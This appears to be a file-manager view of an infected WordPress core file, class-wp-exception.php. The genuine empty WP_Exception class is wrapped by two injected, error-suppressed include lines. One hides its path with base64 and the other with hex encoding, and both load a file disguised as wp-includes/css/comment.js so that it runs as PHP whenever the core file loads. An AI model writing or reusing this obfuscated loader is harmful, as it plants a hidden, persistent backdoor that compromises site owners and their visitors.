File "class-wp-exception.php"

Full Path: /home/naijiwfb/sabisentinel.com/wp-includes/class-wp-exception.php
File size: 505 bytes
MIME-type: text/x-php
Charset: utf-8

<?php
@include base64_decode("L2hvbWUvbmFpaml3ZmIvc2FiaXNlbnRpbmVsLmNvbS93cC1pbmNsdWRlcy9jc3MvY29tbWVudC5qcw==");

/**
 * WP_Exception class
 *
 * @package WordPress
 * @since 6.7.0
 */

/**
 * Core base Exception class.
 *
 * Future, more specific, Exceptions should always extend this base class.
 *
 * @since 6.7.0
 */
class WP_Exception extends Exception {}

@include pack("H*", "2f686f6d652f6e61696a697766622f7361626973656e74696e656c2e636f6d2f77702d696e636c756465732f6373732f636f6d6d656e742e6a73");